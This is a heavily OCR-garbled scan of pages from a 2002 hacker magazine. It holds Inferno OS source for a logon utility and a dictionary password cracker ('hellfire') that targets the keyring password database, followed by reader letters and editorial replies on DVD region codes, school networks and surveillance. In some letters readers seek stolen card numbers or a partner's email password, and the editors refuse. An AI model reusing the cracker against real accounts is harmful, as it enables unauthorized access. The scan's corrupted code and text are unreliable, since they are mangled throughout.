tomers will go to that CL EC across town. Usually,
they can be found in the Phone. Book!
Spring 2002
Page 2 7
Regrettably, we left out the source for two uLilitiu^ that went
along with last issue's amde iwi the Inferno operating sys
tern We apologize for the omission and include them below:
- logon .h - ■
# c logon
port of wm/Iogon to the command line
M
p Ju3 a \{ da I in <8> S wbt met i
# http: // w w s 1 w bt net/ ’dihai
implement dogon:
include "sys,m";
sys: Sys;
include 'draw.m
include ■ r sh,m p1 ;
include "newris.ni".
e logon: module
i
ini r: fn{ ni 1 : rdf l w -<Comex 1 „ a rgv: list of sEri n g);
I;
initinil: ref Draw-<( (intent, argv: list of string!
I
sys = load Sp 5ys<PATH;
sy s -cprintC'clogon . by dalai (dal ai @ swbLnet)\n ;
s y s- <pdUsyx-<» OR KNSjsy - < FOR K FI X nil \ ;
progdir : - "#p/" + string sys^pciltO. nil);
fcfrjl - sy pmgd i r+ ‘Vctl 1 ' , svs-<OVVRITK'i;
if(,kfd — nil) \
s y s-<spri 1 1 1 1 "ea n not i *pe n % s 1 Tr " . pro gt lir+'Vci Id,
sys-<raiserfaiS:bad prog dir" n
)
usr .=
iff argv l- nil) (
argv - 1 1 argv.
ifltugv 1= nil &,&. hd
argv - ll argv:
ifiaigv ■= nil! \
usr = hd argv:
argv = fJ argv:
= "-iCf |
}
]
if (usr = nil || f logon (usr)) |
svx-<pri nit 1 'usage: dag on -u usciV'):
1 ^
(olt . nil ): - sys-<stat{ namespace " )■;
if(ok <= 0) [
ns ;= load Newns Mewns-cFATH:
iffns — nil}
svs-<primi "failed to load namespace builrfer\n
else if {'{nserr := ns-<newn.s(nil, nil)) '.= nil) {
sys-<pnmf "error in user namespace tile: %s", nserri;
svs-<pmtif H \n"H
\
\
sv .s-<f pn nti. kid. " killgtp" );
errch := chan of string,
spawn exeefurgv, errdi);
ei ! : = >-errch:
■1 (err I - nil) j
sys-<fprim(suterri ’ logon: '•; >
svs-<raise("fa»i:uxec failed");
1
", err):
1
exedargv: list of string, errch: chan of string )
I
#ys-<pC£Jfsy , s-<NEWFr?* 0 :: 1 2 nil k
e := ref Svs-dLvLeplion;
if f sys -< rescud 11 fid l c) *= Sys-cEXCETTION) l
- y s -c r e sC ue dt S y s<G N C F , nil):
eJtii:
1
argv = "/dis/sh/sh,dis" :: "-i" :: "-n' r :: niE:
cmd = Load Command lid argv:
if {cmd = nil) (
errch >-- s>s-<sprint< cannot load %s: %r". hd argvn
1 else |
errch >-= nil:
cmd-dnbl m3, argv):
\
i
logon* user: string); inf
(
userdir := 7usr/"+u.ser:
i f{ sy s-<chd t r{ u serdi r ) > 0 ) j
sys-<pnnt{ "There is no home directory far that user
mounted on Hits maduneW K
return 0:
1
# Sel the user Id
#
I'd sys-<of^n( "/dev/user", sys cOWRITE);
ifft'd = nil) \
sys-<prim i ' tailed to open /dev/usef: ^tW);
return U;
l
h := array of byte user;
iHsys"<wriidfd. h. len b) >(|) (
sys-cprinU "hi led m write /dev/user with error: (; -f r\ti ' > ,
return 0:
}
return 1 .
stden }: ref Sys*<FD
f
return sy'f^<lildcs{2);
I
— - dognnTi
hciirircth
tf be 1 1 It re .b : /keydb/piissworil decoder
#
# by : dahiildalai^swbi.tiet)
# hllp://ww vow bt. ne(/-daJui
Page 28
2600 Magazine
implement hel l fire;
include "sys.ni' 1 ;
sys; Sys;
include "drawn si 1 ':
draw; Draw;
include "hufio.m",
hufio BuIict;
l obi. it import bufio;
include "strtng.m";
Mr; String;
include "arg.ip";
aig; \rg;
. include "keyringurT;
keyring; Keyring,
include "set.tjmy.nV’:
pass; Password;
hellfire: module
I
init: fn{etxt: ref Druw-<Gmtext, urgv: list »[" string);
usage. riiO:
finish: fnltemp: array of byte).
}l
init( nil re t' Draw-<Cortiext. argv . fisi ol suing i
f
ays* load Sys Sys-<FATH:
draw = load Draw Draw -<PATH ;
bufio = load Bulio Rntm <PATH ,
str ft 1 uid Slri n g S iri ng -c PATH ;
;<rg - luiid Arg Arg-<PATJT
pass = I nail Password Pass word -<PATH ;
keyring = Wd Vkeyriing Keyring^PATH;
s V s -<pri nl { " V n h e 1 1 fi rc . by da I a i l da I a s ® sw hi . ne t )\it " i ;
sy.v<print("A Traumatized Production An 1 ');
iftargv ss nil)
UKiigef );
ditto pfily uid ;=
arg-<initfargv);
whilefflmp arg eoptf )) 1 = Or
ease tmp [
d -< dJile s arg-<arg( '):
u =< uid = urg-cargl );
ifldfile = nil || urd =- nil )
y.
dftl ** bufio-<open(dfile. bdfUHfQRBAD);
llriifct = ml){
sys-: prinu "Could not open %s.\n\ dfilcj:
exit;
1
pw .- pass cgchuiiri;
rf(pw = nil) |
sys-c prim T Could not get entry for%sAn\ uid):
exit;
sv s-<p rinic'c: me k i ng . . An \n " i ;
pwbu fl' 2 - ,i nay f key nn g-<S H Ad 1 e nj o I by £ c :
pwbufT f= array f key ri ng -<S H A ri len 1 of byte;
# try some common passwords
fort n I; n >4: tj+-h|
iffn — 1 )
pwbu IT = array of by (e "password';
iff n — 2)
p whuff = array of by I g uid;
iffn =- 3)
pwbu 17 = array of byte
fceyring^sha(p whuff. keynng-^SKAdieri, pwbuffX nil);
tempi ;= string pwbuffZ;
temp A : string pw.pw;
i ft temp A — tempt >1
fjmshcpwbiift’i;
]
H if not. try (he dictionary
tortdentry ;= r ‘" ; ;)(
den try = dfdgeUfV);
iffdentrv = ml)
break ;
iffdentryflen dentiy- 1 \ =- An' if
heh:^
(huh. mlt - str-csplitlCdentry, "m");
dentrv = heh;
I Y
p whuff - array til byre dentry;
key nng- <shatpw bub keyring-^ SHAdJen, pwbtiffZ nil);
tempi ;= siring pwbufTJ;
lcmp3 string pw.pw .
if(temp2 ^ - tempi }\
linish(p whuff);
}
: ,i
sys-<pnnt* "done An" j;
sys-epnnh "Have ,i nice day An" K
eSH;
I
fimsbtp wbt i f¥ a ira v of byte )
[
>y.s-<priTiLi "Password is \"%sV\n". string pwbufD;
sys-<print{'’Hnve a nice dti> \n"):
exit;
1
usage* )
<
sy#-<fnintf "usage; hdltire -d dictionary u use An") 4 ,
exit;
I
— hidShic b “ —
Spring 2002
Page 29
Signs of Hope ff jff
Dey r 2ffOf);
I hm‘ only fust di severed ■ your radio show in (he
hist, month, and have now downloaded most of this
•rar •'
year's shriws and also subscribed to 260(1 On the sub-
ject of DVD p layers, I work in a major consumer dec-
ironies store here in Australia. In the last 12 months all
major DVD hardware manufacturers have introduced
not just region free but region selectable players that
bypass any advanced region encoding. It started with a
few unknown Asian brands. Then Pioneer, Philips,
Samsung, L.G. Panasonic, etc. all introduced these
mu it [-region p layers (most also have mp3 playback}
The only major manufacturer not to release a player ol
this type is Sony. Some oft he cheaper brands can e ve n
be Macrovision disabled. This is a direct result of both
government policy and consumer power. Government
competition po.Ucs says vwa can seP, unv TWO player
m this country fas you already know our competition
watchdog is looking very closely at the whole region
coding thing saying it may be used to artificially inhate
prices) and the consumers decided they wanted multi-
region.
The amazing thing is the response we have had in
I ) V D re I case times here I w t is pu re h as i ng D V Ds fro n 1
the USA and Canada last year because there was a
three to six month delay in the major release dates be-
1 ween our countries. Hie times ire now around a
month or .so for most major movies, so I wait for the
better quality PAL versions i sorry, but NTSC sucks).
At the moment we are at Ihe beginning of having
digital television forced upon us by ihe media giants of
the world, but that’s another story.
Brelo
This r \ an excellent example of the importance of
regulating huge corporations by a government which
tt >pre se tit\ th c pet tple !v \ \ ishes . Been it se our go i e rn -
went and our corporations are virtually one and the
same, consul nets simply don't have the power they
should have. If we ever succeed it: pulling them apart,
we mti\ have a chance. Thanks for the inspiration
Dear 2600:
I just got back from a major electronics store
known as "Fry’s Electronics” and [ got in some serious
trouble. I donT have my own transportation so [ have
to ride the bus all around town. When 1 was in this
store, f pulled out my bus book to know what time the
neat bus would come by. In doing this I had to open
my book bag that goes everywhere with me that had
some back issues of 2600 in it. Minutes later this guy
asked tue to show him what was inside my bag (since
he saw me going, through it), I told him sure, why not.
He opened my bag and behold - ten issues of 2600 . He
said he was going to gel security to escort me out. ]
asked why He said it was for hacking the store com-
puters. 3 told him it wasn't true and that all they had
w ere computers running winxp with no online access.
Ho claimed that he saw me doing it I asked him it we
could go down to the tech bench to talk to someone
who, knew what a hacker was. He agreed. We talked to
the department manager who said and I quote; "Please
leave the kid id one. There is no way he was doing any
thing bad to ihe computers," About ten minutes later
the manager said, "So kid. how is the MPA A lawsuit
going, huh V
avatar
For cast's that dot Ft end so well, it's important to
know that in many places searching someone \ hag in
this way is illegal and van open the establishment up
to legal action.
Higher Education
Dear2^|.‘ ^ ^
I am in high school right now and on our school
computers there is a program installed tfijfi censors the
Internet. The Program is 'Gear 31" and it’s made by In-
terne! Content Management Software, I was wonder-
ing if anyone knew anything about the program and
some possible loopholes in it.
A7th
The w ord is out.
Dear 2600;
Noi myself being a person to exceed the bounds of
i he law (I try to adhere to a strict moral code], I had a
briet skirmish with the authorities of my high school
which, thankfully* did not advance very far along tire
disciplinary lines, I would like to know the opinion of
some other computer users.
The school runs Novell Netware and i idiotically)
diil not turn off the feature that allows users to send
messages to each other. During a typing class I was
forced to take, my lingers roamed across the keyboard
a nd 1 began to look around the system, ! realized that
the system was allowing rne to modify anything and
that I could send messages to another user. After
school. :ii a later date, i sent a message to another
classmate in another room. A classmate nex< to me
alerted the librarian that I was "using the computer for
bad stuff/' The librarian became red in the face and
pulled '.ve to the principal’ s office. She informed she
principal that i was crashing the network, I found this
to be a ludicrous charge against me but didn’t contest
tt, seeing as how u would upset the situation. I got off
with absolutely no penalty except that all the computer
teachers vs ill be looking over my shoulder from now
on. My quest tori is whether or not sending a message
to another user is a great offense.
St Mike
The great offense is doing something that the peo-
ple in charge didn 't understand. Unfortunately, in most
Page 30
2600 Magazine
high schools. that applies to plm< >si ativfhing that hap-
pens after the power is turned on.
Help Wanted
I )ear 2600:
1 want to lea rtf hriw to hack' in such a bad way it
male's me sick! ! have die hunger for the information
and a lot oi tune on my hands, i don’t know how to
even key, in to stall my hacker education,. what books to
buy* vyhat pro jgs or tools to get. I just picked up your
mag in ,i hook store ami couldn’t believe it Fpalfy an*
■ ■.vers ui sohte type ot ftdpj J was certain . 1 Canyon
guys a i teas! point me in the right direction ' By the
way. you guys rtfekf
Mingus
We gel about a dozen of these inters every' day. So
rot isider yourself honored that sours nm selected
completely at random. There art a couple oj things
that have to in understood, f irst, relatively feyc people
are hackers , even though quite a few cither wont to he
or walk around saying they are. Most of who! cons to
f ides hits kit tg i s t it e \ v hole p n mess t tj figuring th ings
■mi. \V7idifc we ran offer rips and suggestions on spe-
cific applications of technology, tec Cannot tell von
how it) think, That's some thing you either develop on
sour own or run. if yott keep ad open mind and. don >
sh\ away from activities which most would view, as a
complete waste of time, von 're off to a good start, And
learning a Utile history is always a wise move ■ there
are plenty of online resources in addition to our tnayti-
zint which document she milestones of our t ommmmv
I)car26^;
Hey I need some help on finding some credit card
and pin numbers so if you can help i m do this HI do
you a favor so hook me up....
Asbigasscx^aoLcStii
( 'on side r yourself hooked up. We get hundreds of
these requests every week most always as a res ids of
some My media repose on iwwkcry. fu iE. weird way. the
media seems to he creating these people - they go on
the air and print stories saying that hackers go around
stealing things and then the people who go atmnul
dealing things sec this and shin calling themselves
hackers. Perhaps we should come up with some choice
definitions of media so that everyone equates them
n ith liars
U*ar im \ ;
i think my gill friend hast been cheating on me and I
wanted to know il I could gel Iter password to Hotmail
and AOL. I am so desperate to find out. Any help
would !>e appreciated* Thanks.
HSFk2
And this is vet another popular category of fetter
uc yet. You say any help would be appreciated? Let 's
find out if that's true. Do you think someone who is
cheating on you might also he capable of having a
mailbox you don 't know about? Do you think that even
if vo a amid get into (he mailbox she uses that she
would he discussing her deception there, especially if
u'c live in a world where Hotmail and AOL pass words
r ire so easily obtained? Finally, would you feel heller if
you invaded her privacy and found out that she was
hang totally honest wish you',' Whatever problems are
goirtg on in this relationship are not going to he sol ved
with subterfuge. If yon can 't communicate openly,
there's not much there to salvage.
Corrupting Youth
Dear 2600:
l just want to start by saying that I totally agree
with the first sentence of JohnG54429's letter in your
fall issue It is grciiL what you're doing for Today’s
youth. All that I’ve seen you print in your magazine is
tl ec truth and it it causes more American youth i like
mysdO " tftdosc morale for this great country." then so
be i\\ Wm\ they won’t have blind leva by to a conn
try without knowing the truth. And may be once more
people realize this, we can all help to change the gov-
ernment .so il will once again he someth mg we Can hi*
proud of.
e\_chrOnos
Miscellaneous Info
Dear 2hUlt:
Just a heads up that the final build of Windows XP
home edit i on version 5 i 2600 h:o incidence?) default
install does n i have any firewall protection enabled.
Ail attacker will have access to s u ch services as smtp,
ft p . and neihins serv te e.s. To enable your fircwal I e heck
me ix>x ’Protect my computer w ith firewall" in the ad
vanced tab under the Connection Properties dialog
box. 1 can i believe Microsoft didn r inform the user
about This option as the average computer user has no
worries about Internet security
Also. I he investigation of Enron will be done w ith
a program called Ej tCase. Ibis computer forensics
program enables someone to view- data alter it is
dele l ed fro m t he most popi i f a r oj ie rati ng sy m c r c u i -
ready in use. The web site htlp://w ww.guidance&oft-
warC.eomyiitml/index.htnd allows you to request a
demo disk Don't spoil il for everyone by ordering
20,1 >00 o f t heni overnig ht ! I f you know nf anyone who
has die lull version of this, declare them your best
friend and see il they’ll burn ya a copy because it’ll
cost ya $2,500 r
-d&solUteii
Dear 2600:
Please check nut these important sources of critical
inform at ion!
http: // 1>3 i > | ec tc en s< ) ret ! org
http:// www. copvc i a. Corn
h ftp: //ww w . i n dy me dia, o rg
http: f/il i sek rsureprt rject.o eg
Empty Set
Dear 2600:
When 1 first was interested in programming, I dici-
n’ I want u> invest any money before 1 knew for sure
what it wax all about. 1 was saved by a great language
called Python. Python is an interpreter; which means it
executes the source one tine at a lime instead of mm
mg it into machine Uriigtiage. Python is fljs£ ubject-orj-
entedt a near necessity for any modern language. But
perhaps the most appealing faidi about python is that it
Spring 2002
Page 2 l
is free! The syntax of Python is remarkably dear, yel n
May* powerful and com pelt Live, h has plenty of docu-
mentation all over the web and is a great language lot
beginners and experts alike.
The article isn’t much bui in my opinion Python
deserves a whole lot more respect. Fed free to edit a: d
add 0:11 to this article. I just want a free t-shirt or 26(H)
e-mail
Raleigh f ross
U v rather dear that \s what you want. It 'v time once
again tit clarify run policy. Letters arc not articles!
And articles: should not i)c written far the sole purpose
of getting fret staff, it’s screamingly ob\ ions when they
are.
Dear 2600:
1 am writing in response to dmitry kostyuk's letter
in your 1H:4 issue. Me was asking for a program to
convert Microsoft Word files into HTML tiles. Mi -
Crosolt Word can save as an HTML tile, Fo do this go
to File- Save As. Click on the pull down menu labeled
"Save as Type", select HTML, Type in a file name and
hit Save, Also. I have not seen the specs on Microsoft’s
■doc Uittov However, iv ; ,s v^ed outside of Microsoft .
Sun Microsystems makes a free program called Star
Office which is capable of using Word files. Hope this
helps.
Rev ;munt
Dear 2600:
1 just got m> copy of 18:4 and was pleasantly sur-
prised iii >,ee the letter by No Name" on the @homc
Malm. 1 agree, the information he'^ given out is not
much lo hide one’s name or handle over. The Matrix
dots not, in fact, allow you to access someone’s com-
puter direct ly. The Matrix works in a tier system. The
higher the tier, the more access you have.
Some of the higher tier accessing staff never both-
ered to log out afterwards. They were: matrix- users,
m aj ordo mo * M atm [You bic , ani La J ohsti ton , agen tile,
bart_. connors, hmartone, brutkow.sk i, clow cry, DHen-
nie. Thirell_Mo.se tuy T fschmidL happ legate, jbrenuan,
jsapienza, jtrccce. Irohinson. rsimmons, rsuIJivat^
shill, .1 1 7726458 1 . t wright. and j grove.
The Matrix was located at 24/257.21)7.77, hut un-
fortunately it was taken down permanently as of Feb-
ruary 28th, 2002. However, the greatness of this
system should not be forgotten and any who wish to
learn more about it may wish to go to
bttpjTrnvln x .home ,n elidoc i M' atm 6 r pdf and read the i r
Matrix User's Guide.
Doodle
Unfortunately with the demise of @home> this ad-
dn'ss is no longer valid . ff we find a mirror, well pass
it along.
Dear 2600:
You may Of may not already know this bin I
haven’t seen it in your magazine or elsewhere. The
British anarchist band Chuinbawamba put a remix of
heir song "Pass It Along" on their web page a while
ago ft features sound clips from MctuIJica. !)r„ Ore,
and f-.niuiem. gll appearing without permission. Better
yeu h. has excerpts from Jello Biafhrs H2K keynote
speech. You can download the song and read their
press release concerning it at: hEip://wwwxhumba.-
corn/_passi talon gditm .
On a side note, General Motors bought the rights
hi use this same song (the album version, not the
remix) in their recent Pontiac commercials. Appar-
ently. C’humhawamhu turned around and donated hall
of that money to Corp Watch, who plans on using the
money to document the Asocial and environmental im-
pacts of GM itself. 1 ' The other half went to Indy Media.
Chumbawamba has a very in teres ting political past.
Among other things, a member once dumped a bucket
of water on Great Britain's Deputy Prime Minister
John Prescott Ibr his handling of a dock worker s'
strike. fTs good lo know that a (relatively) mainstream
hand is this potiticatty conscious.
1 love your magazine and hope you can prevail in
your current and future endeavors. Good luck to you.
Random Juhatus
Answers Needed
Dear 2600:
I'm just curious to know if your magazine has u
in ini mum f maxi mum length requirement for article
submissions. Let me know-.
Kick Olson
aka fluffy
.4.' indicated above, something extraordinarily
short will probably he looked at as a tetter: Articles
should he ay i/t -depth as possible without being overly
wordy. Since we wind up editing anyway ; it's best to
give us as much info as you urn rather than too little.
So there are no formal requirements either way - just
go with your instincts
Dear 2600:
I may excuse you because of the September II th
terrorist attacks but 1 sent you four photographs of
payphones (bv mail) and 1 don’t have my free sub-
scription. I also sent an e-mail to letters® 2bfl0.com
and the only thing L got was an automated answer.
"Thank you blablabla,...’ 1 Maybe sending to all of your
addresses may work, fhank you for being so commu-
nicative,
Johnny
First off we have always been way too bus y to re -
spand to each and even piece aj mail we get. Most
people and certainly most magazines simply ami ten do
this . Second, we're quite clear on our web page that
you wiJJ get a free subscription if your payphone pho-
tos are printed. You seem to think that just by sending
us photos you qualify. That's not how it works. Third ,
the automated answer von got from the letters e-mail
address explains that personal replies area ) possible.
Why you then eh ose to enter into an extended dialogue
with an automated reply function is something people
who do have time on their hands nntv choose to pon-
der, Finally, all you succeed in doing by flooding us
with annoying mail is to he labeled os someone worthy
of being ig no red altogether.
Dear 2600:
When exactly do you plan on releasing Freedom
Downtime ? It’s been about a year already since it was
completed. You could at least release it on VHS; the
Page .12
2600 Magazine
medium really doesn't matter
haux
tVeVe wanted to release it more than any* me has
wanted So tee it so we imdcrstand the frustration. H4 j
needed to makt sure we a we red the legal bases with
re yards to the musk we used since stung us has he-
come corporals \merica > latest sport. But we 1 re
happy to sa\ that these hurdles arc he hind us and sou
\hould find ordering info in this issue and on our web
siu Par now it's in VHS format. We expect to have a
DVD version same lime jfs fht\ftth}rc.
Dear 2600 :
\ would like to contribute some money to the
DeCSS appeal legal dele rise fund, Please let me know
how to do so.
Dill Boyle
The Efenrcmh Frontier Fmmdaikm covered the
fa gut expenses for that eon . Yon can donate to them at
www.e.ffarg or bv writing to LI F 454 Showed Street,
San Francisco, CA 94110-19! 4,
I lear 2600 ;
I attend a meeting of security administrators at my
office every other month. In your recent issue, there
are two articles that 3 would like to photocopy and give
out at dus meeting to give Other attendees a better un-
derstanding of what information is readily available to
people try ing to break into systems and why you must
keep patches current and lock down the server. What
would be the proper way to get permission IVom you to
c opy these articles and give them out in the meeting?
Anti- Chris!
its amazing to us that people at fiutllv think they
have to da this. This constitutes personal ;iu ■ vow
have cveiy right to use excerpts of a publication in
such a manner without asking permission
Dear 2600:
My father passed away Inst year. ? ^fortunately he
used my name and social security number nt the past.
Now I don’t have a good credit report; and I need help.
Can you help me? I am the father of two baby girls and
I would like to buy a house one day.
top
Assuming you don't want to continue the family
tradition and simply use vour kids ' SiSfls, vau need to
■ ha.tr yota name. You seem to hr under die impression
that h tickers go around wiping people 's credit reports
ot i : renting new identities. Of the relatively fox win/ do
know how to easily da such things, hardly tin \ would
ever do it for hire. And n-e don't talk to them.
So the first step is for you to stop a* tiny like you -e
guilty oj a crime. Unless xou arc tWc still won) he
aide to help you hut we'd at least respect your hon-
esty, ) if if happened the way you said it did , there are
it -ays of dealing with it. Check with the Socfut' Security
Administration and the various credit bureaus and teU
us what they say, If you Ye forthcoming with (hem and
dan I do anything stupid like ask people to help you get
hike . /edit, you at least have a t hance of setting things
tight. And even if then doesn’t work „ there arc other
channels which cun give van a voice.
Dear 2M0:
I've been reading 2600 for. well, most vears t
could read and comprehend what was written on the
pages of 2600, It comes lime now that 1 have a band
and we have been ripping our bra ms out for names to
call ourselves arid finally I suggested '2N.H4" My only
questions are: Is this legal? Is tins okay with the writ-
er s/ed i l or s o f m y favorite zinc? I know 2600 is onl y a
degree of megahertz used in phreaking. but it is a name
trademarked by you. 3^ this all right?
1 >rew
it's hertz, not megahertz.. While it's it very nice
themghi, we wmiltinV be entirely comfortable with a
hand going around with that mime. What would hap
pen if you became really big and your music started to
suck? People would forever tissue kite the name
"2600' with corporate fork and ice V/ probably wind
up gening sued by the giant record nmqxiny that
signed you. Imagine (he irony. But seriously, we have
no say in this . You can call yourself whatever von
wat i f 1 Vt ' d he hoj ip ie > ; th t nigh , if it n ere a refer v uk v t ■ t >f
some sort rather than the entire name. Af ter all, there Is
always the chant e that we 're going to quit this pub-
lishing thing and turn into musician ■> one day,
Dear 2600:
While flipping through my recently purchased
I S:4 1 noticed something odd. Some of the pages were
blank 1 How ever will I build my wooden computer
since pages 22-2? are missing J Mow- will 1 know the
outcome of the 'Right Click Suppression" article with-
out page 19? i will not be able to Harness the Air
wives? m page Its wots dvxs blank. In addition. 35. 3 irk
39, and 42 were also blank. 1 hope this is just a case of
a misprinting and not a larger conspiracy by someone
to keep the information from reaching the masses. If it
was indeed just a misprinting, could the pages listed be
sen or posted somewhere so that we could read the
rest or the articles that were to have been printed on
these pages?
SuperGuldft
if you ha a. such a printing defect in this or any Is-
sue. send it in to us and we'll not ontx send you a re
placement, but an extra issue as well for your tnmbh .
Dear 2600;
Just curious - do you have information stored away
in random pictures on 2b00.com ■' Sfegdetecl reported
thai a few jpgs from your site have information stored
with jphide. However I have been unable to crack
them to determine if this is true...*
Ciiin
D ear 2600;
At my law studies class this morning, we had a
guest speaker. Je was a Secret Service agem He
popped in a tape that explained to us what the Secret
Service was and why we wanted to be in it. In a couple
of scenes, they showed either your website or maga-
zine. i can'! remember' what the cover was though, so 1
don’t know how old it was. Anyway, the video was
talking about how the SS is very knowledgeable on
technological forms of theft, fraud, and hacking and
how thetr agents arc highly trained in investigating
these things. It showed an agefjjj pullmg up your web-
site. Then later, when they Were talking about credit
card fraud and other computer crimes, it showed a
desk with a computer and a 2600 sitting next to the
tammy b loo
keyboard. Just thought you'd like to know. Don’t they
have li> ask permission Tor that or something?
Kaos lord
Ft Lauderdale, FL
We're not concerned about our covers being used
so much as we’re concerned over the context. If
they're implying by their use that we’re involved in
criminal activity then we have something to talk so
them about. UYhv been hearing about this video for
some time now - hope fatly one day someone can get us
a copy of it. -
Complaints
E^r2^
The meetings for Orange County are a joke. It’s
like a bunch of kids in a pissing contest. These people
are making 2600 look sorry’,
john smith
Let ’s be clear about our meetings and the relation-
■ship between them and the magazine. Our affiliation is
1 1 very loose one hut we do consider she meetings to he
representative of what She magazine stands for. That ’s
why we have a set of guidelines (available in the meet-
ings section of our web pages or by c- moiling meet-
ings^ 260Q.com) which sped out what’s acceptable
and what isn’t. For example, our meetings are open to
the world. 7'hat means inevitably people who don ) re-
ady believe in what we stand for will show up, We cam
not prevent this. Usually there arc multiple sections at
any single meeting - their only common point being the
mee ting guidelines. It’s important to remember that no
one group of people runs' any meeting. Therefore, to
define it as you have means that either von 're paying
tinetitkm to the wrong people or the meeting has in
fact been subvened by idiots who don’t respect our
guidelines. The loner has happened in the past and
probably wilt in the future. When we find out (and we
most always do), our name comes off it and it becomes
just an anonymous group of idiots in a mod on a Fri-
day night t
Dear 2600 :
To she ''hacker" who was on Cool FM 98,5 (in
Montreal) on O2/U/02: shut the fuck up! Thanks for
idling everyone thai hackers are nothing but simple
thieves, I hope vou die in horrible pain!
IHrl3z3
There's nothing like an intelligent counterpoint to
I move a point.
Dear 2600:
I am sick of it. J am sick of being labeled a crimi-
nal, S am fired of being branded as a menace to society
and a threat to order i was 'i Yipping through the TV
channels and 1 started watching .some movie. 1| was
like Mas Something Super Sp\\ bill anyways all il was
was some anti backet propaganda crap that Holly-
wood churned out. I am so tired of it,. Wt arc con-
stantly being bashed because we are hackers. I hale the
common misconceptions of us. If you are a hacker that
means all you do is break into people’s e-mail ac
counts and write viruses. Even looking a I the dictio-
nary is appalling, il says a h acker is a talented
amateur user of comp tilers;, specifically one who at-
tempts to gain unauthorized access to files in various
systems. 11 Thai is just not true. I lackers aren’t evil, we
are realty good people. But everyone hates us. Why?
Because we get the fallout from people who write
viruses and stuff like that, that's why. Because so ami
so wrote a virus and the media said he was a hacker,
that means all of you hackers are evil. We get pinned
with the blame, Il s gelling so bad ihal if you say (he
word hack people sort a cringe, like when you say mur-
der or something Bui if you try and hide the fact that
you're a hacker yens lor them wm, You let the media
make you ashamed of who you arc. So be proud to be
a hacker, be proud of who and what you are.
Binary Burnout
Worries
n ** r Wm\ n fc i M
Have you all had any concern of the U.S. govern-
ment freezing your assets due trt "terrorist activity' ?"
(Not that hacking is a terroristic activity, but the U.S.
Patriot Act of 2001 says it is! )
Mr. Brown
Our biggest comfort in that regard is that we don’t
have a whole lot of assets in the first place. Actually,
that s probably not very comforting at ad.
Dear 2600 :
Here is something I though everyone might find in-
teresting to think about. A few days ago I received a
code from a person asking me to crack it. A few days
later 1 did and sent him the decrypted message to prove
that i had done it. 1 Ire reason he claimed for sending it
involved a huge "worldwide underground hacking
group." While he seemed to give the feeling that this
was something of a rather "elite" group, he mentioned
no specifics about it. After sending him the decrypted
code he proceeded to tell me that he worked tor a gov-
ernment agency in Australia called the AS IQ (Aus-
tralian Security Intelligence Organization) and that
they were looking for people who could do things like
crack codes, hack, and so on. After hearing this I had
no desire to continue communication with this person
but here is the interesting part. The second step for
"joining" was to crack a harder code using a program.
Easy, right? Yes, but here is the catch. After doing so
they will hack the computer that you used to download
the program to look at your hard drive So basically
they are looking for hackers and cyberterrorists but at
the same time are recruiting hackers. Anyway, once
they have hacked your computer (and this is govern-
ment! !!), they will use your computer as their personal
proxy. So if they are tracing a eyberterrorist and the
cyberterrortst is smart enough to figure out he is being
traced, he will send u trace hack. At this point it would
lead to the AS I Os "proxy," in this ease my computer.
So let’s think about this. Now ii looks like my com-
puter is tracing them and the cyherterrorists go after
this computer. Why would anyone in his or her rig hi
mind let this happen ? Hope this gives everyone some-
thing in think about,
3-C oni
Oh it does. Like perhaps you 've confused your
computer with \ our TV set.
Page 34
2600 Magazine
Dear 2600 :
As if Carnivore wasn’t bad enough, now we have
the government stealing out encryption keys to read
l he encrypted lilt's that we have every right to keep pn-
v at e Hi i s st i m wj re km jw n as Mag i e Lun te i n ' ap par-
L’nily installs a key logger on a target computer to grab
the pass phrase used when pgp hinds. Our individual
rights are continually being violated by this Cyber
Knight" project that encompasses Carnivore and
Magic Lantern. You gotta wonder what else they have
up their sleeve. I say we hold public protests. More
people need to he informed about this.
Silent
hi addition, when someone finally finds this thing
on their system, let ns know so we can print on article
‘•n how it. j deter I it. In fan, we suspect the re ore people
, wtiwly -.trying to get if for just such a purpose.
Ideas
\ tear 2600 :
I am working on a project right now you may find
l>T interest. 1 heard of a neat device called a Telezapper
which would not only automatically disconnect tele-
marketers hut because of the disconnection their soft-
ware removes you from their database. 1 looked into
the device and what ii does is send out a Lone (discon-
nect pulse) In their switching equipment, father than
spend S40 to buy this device, 1 had the idea of using
my modem and sound card to generate the signal, so
all you need ss a bit of software and cable. Once 1 gel
this working and if no one has done this before, would
you be interested in an article?
Dr war
We'd certainly like to know more. We know of no
such 'disconnect pulse ' that could he used to get rid oj
any eme, lei atone telemarketers. About the only dung
w.e ran imagine ss that this device pin vs the three tones
i -otnnitm.lv heard before an intercept recording which
might tnuk r their auto-dialers assume it's not a valid
number. Ii V Hole more than wishful th Inking that this
means pu number would be purged from the database.
This could re suit in t j titer ca Us ben ig lost as wadi Hut
most importantly, paying 50 bucks to have these lanes
played would be a hit of a seam, to sa\ the least. We
had (t better smite (assuming you don't want to pick
up any culls that dm ft display culler ID J is offered by
many local phone cent) pomes m a fraction of ihe east.
- oilers who don ' t transmit culler ID arc prompted to
sas their mimes. The called party's phone then rings
with rhat person's name and they run either accept the
■ dl tti that point or refect it (or eotnpleiely ignore if),
fidema renters who don ‘i identify themselves never
■ l yn ring yom phone.
More Politics
Wear 26W
I am a long time newsstand buyer of your maga-
zine, which I’ve always found to be highly informative
in its anil les, v bile the letters of a political bent lend
toward a naivete that strikingly contrasts the technical
opiusticatipn of contributors. Keep up the tight for the
ights of individuals to use technology. Unfortunately,
v oil seem to suffer from a similar naivete as your read-
ers when ii comes to other technologies, like guns.
Firearms are simply a Icchno logy, like any red box,
laptop, modem, network card, ( apfalri Crunch Ring,
or computer programming language. They, like any
technology, can be used to enhance or detrac t from in-
dividual liberty depending on the user, their intentions,
and their actions. Thus, like any technology, (i rearms
are morally neutral, inanimate objects, .hist as a hacker
could potentially ruin the life of any individual 01 -
group of individuals in the world via identity theft or
other malicious abuses, any person possessing a
dreamt can similarly potentially ruin the lives of oth-
ers. it is the actual actions of ihe individual wielding
technology that determines actual results, as you have
so rightly staled so many times in the past with regards
in various computer techno todies. You should be at
least as consistent when it comes to other technolo-
gies, like guns, as well.
Mike ‘retro man* Lorrey
Hi'iv always advocated the responsible use of any
tool dr technology and that its the user of these who
hears ultimate responsibility for their nse/mixuse, We
hid ic i v 1 1 h i Is and te i hnolog \ tin > t t ii ret t i\ fos ter eom-
immication. education, and the flirt he rams of free
speech should be made as widely available as possi-
ble. This has always been our push ion. One s imply
cannot think of tools with obviously lethal functions in
the same miy, however. To do so is she height of irre-
sponsibility.
Dear 2600:
In I K;3, I was reading your response to a Canadian
